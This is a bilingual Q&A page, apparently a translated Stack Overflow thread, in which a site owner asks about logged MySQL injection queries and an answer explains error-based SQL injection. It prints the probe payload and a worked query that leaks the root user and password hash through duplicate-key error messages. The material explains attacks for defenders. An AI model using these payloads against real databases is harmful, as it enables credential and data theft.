SQL注入攻击-这是做什么的? [英] SQL Injection attack - What does this do?

问题描述

我在我的网站上检测到一些失败的SQL注入攻击. 失败的查询具有以下形式:

SELECT 6106 FROM(SELECT COUNT(*),':sjw:1:ukt:1'x FROM information_schema.tables GROUP BY x)

':sjw:1:ukt:1'部分是专门构造而成的，将变量串联在一起以给出随机的0或1s等.

我想知道这些查询做什么?

数据库是MySQL.

更新:这是原始注入的SQL:

(SELECT 6106
 FROM  (SELECT COUNT(*),
               CONCAT(
                        CHAR(58, 115, 106, 119, 58), 
                        (SELECT ( CASE WHEN ( 6106 = 6106 ) THEN 1 ELSE 0 END )), 
                        CHAR(58, 117, 107, 116, 58), 
                        FLOOR(RAND(0) * 2)
                      ) x
        FROM   INFORMATION_SCHEMA.TABLES
        GROUP  BY x)a) 

它失败并显示消息

键"group_key"的条目:sjw:1:ukt:1"重复

解决方案

攻击的真正作用

关于此攻击，有一个微妙而又巧妙的细节，其他应答者却没有注意到.请注意错误消息Duplicate entry ':sjw:1:ukt:1' for key 'group_key'.字符串:sjw:1:ukt:1实际上是MySQL服务器评估的表达式的结果.如果您的应用程序将MySQL错误字符串发送回浏览器，则错误消息可能会从数据库中泄漏数据.

在没有将查询结果发送回浏览器的情况下(盲SQL注入)，或者经典的UNION SELECT攻击难以实施时，会使用这种攻击.它也可以在INSERT/UPDATE/DELETE查询中使用.

正如Hawili所指出的那样，最初的特定查询不应泄漏任何信息，它只是一种测试，以查看您的应用程序是否容易受到这种注入的攻击.<​​/p>

攻击没有失败，就像MvG所建议的那样，导致此错误是查询的目的.

如何使用它的一个更好的例子:

> SELECT COUNT(*),CONCAT((SELECT CONCAT(user,password) FROM mysql.user LIMIT 1),
>                        0x20, FLOOR(RAND(0)*2)) x
> FROM information_schema.tables GROUP BY x;
ERROR 1062 (23000): Duplicate entry 'root*309B17546BD34849D627A4DE183D3E35CD939E68 1' for key 'group_key'

为什么会引发错误

为什么查询在MySQL中导致此错误对我来说还是一个谜.它看起来像一个MySQL错误，因为GROUP BY应该通过聚合重复项来处理它们.实际上，Hawili对查询的简化不会导致错误！

基于随机种子参数0，表达式FLOOR(RAND(0)*2)按顺序给出以下结果:

> SELECT FLOOR(RAND(0)*2)x FROM information_schema.tables;
+---+
| x |
+---+
| 0 |
| 1 |
| 1 | <-- error happens here
| 0 |
| 1 |
| 1 |
 ...

由于第三个值与第二个值重复，因此会引发此错误.可以使用任何至少具有3行的FROM表，但是information_schema.tables是常见的表. COUNT(*)和GROUP BY部分对于引发MySQL中的错误是必需的:

> SELECT COUNT(*),FLOOR(RAND(0)*2)x FROM information_schema.tables GROUP BY x;
ERROR 1062 (23000): Duplicate entry '1' for key 'group_key'

在PostgreSQL等效查询中不会发生此错误:

# SELECT SETSEED(0);
# SELECT COUNT(*),FLOOR(RANDOM()*2)x FROM information_schema.tables GROUP BY x;
 count | x 
-------+---
    83 | 0
    90 | 1

(很抱歉迟到了一年，但是我今天才偶然发现.这个问题对我来说很有趣，因为我不知道有什么方法可以通过来自MySQL的错误消息泄漏数据)

I have detected some failed SQL injection attacks on my website. The failed queries are of the form:

SELECT 6106 FROM(SELECT COUNT(*),':sjw:1:ukt:1'x FROM information_schema.tables GROUP BY x)

The ':sjw:1:ukt:1' part is specially constructed with variables concatenated together to give random 0s or 1s etc.

I would like to know what these queries do?

The database is MySQL.

Update: Here is the original injected SQL:

(SELECT 6106
 FROM  (SELECT COUNT(*),
               CONCAT(
                        CHAR(58, 115, 106, 119, 58), 
                        (SELECT ( CASE WHEN ( 6106 = 6106 ) THEN 1 ELSE 0 END )), 
                        CHAR(58, 117, 107, 116, 58), 
                        FLOOR(RAND(0) * 2)
                      ) x
        FROM   INFORMATION_SCHEMA.TABLES
        GROUP  BY x)a) 

It fails with message

Duplicate entry ':sjw:1:ukt:1' for key 'group_key'

解决方案

What the attack really does

There is a subtle but clever detail about this attack that other answerers missed. Notice the error message Duplicate entry ':sjw:1:ukt:1' for key 'group_key'. The string :sjw:1:ukt:1 is actually the result of an expression evaluated by your MySQL server. If your application sends the MySQL error string back to the browser, then the error message can leak data from your database.

This kind of attack is used in cases where the query result isn't otherwise sent back to the browser (blind SQL injection), or when a classical UNION SELECT attack is complicated to pull off. It also works in INSERT/UPDATE/DELETE queries.

As Hawili notes, the original particular query wasn't supposed leak any information, it was just a test to see whether your application is vulnerable to this kind of injection.

The attack didn't fail like MvG suggested, causing this error is the purpose of the query.

A better example of how this may be used:

> SELECT COUNT(*),CONCAT((SELECT CONCAT(user,password) FROM mysql.user LIMIT 1),
>                        0x20, FLOOR(RAND(0)*2)) x
> FROM information_schema.tables GROUP BY x;
ERROR 1062 (23000): Duplicate entry 'root*309B17546BD34849D627A4DE183D3E35CD939E68 1' for key 'group_key'

Why the error is raised

Why the query causes this error in MySQL is somewhat of a mystery for me. It looks like a MySQL bug, since GROUP BY is supposed to deal with duplicate entries by aggregating them. Hawili's simplification of the query doesn't, in fact, cause the error!

The expression FLOOR(RAND(0)*2) gives the following results in order, based on the random seed argument 0:

> SELECT FLOOR(RAND(0)*2)x FROM information_schema.tables;
+---+
| x |
+---+
| 0 |
| 1 |
| 1 | <-- error happens here
| 0 |
| 1 |
| 1 |
 ...

Because the 3rd value is a duplicate of the 2nd, this error is thrown. Any FROM table with at least 3 rows can be used, but information_schema.tables is a common one. The COUNT(*) and GROUP BY parts are necessary to provoke the error in MySQL:

> SELECT COUNT(*),FLOOR(RAND(0)*2)x FROM information_schema.tables GROUP BY x;
ERROR 1062 (23000): Duplicate entry '1' for key 'group_key'

This error doesn't occur in the PostgreSQL-equivalent query:

# SELECT SETSEED(0);
# SELECT COUNT(*),FLOOR(RANDOM()*2)x FROM information_schema.tables GROUP BY x;
 count | x 
-------+---
    83 | 0
    90 | 1

(Sorry about answering 1 year late, but I just stumbled upon this today. This question is interesting to me because I wasn't aware there are ways to leak data via error messages from MySQL)

这篇关于SQL注入攻击-这是做什么的?的文章就介绍到这了，希望我们推荐的答案对大家有所帮助，也希望大家多多支持IT屋！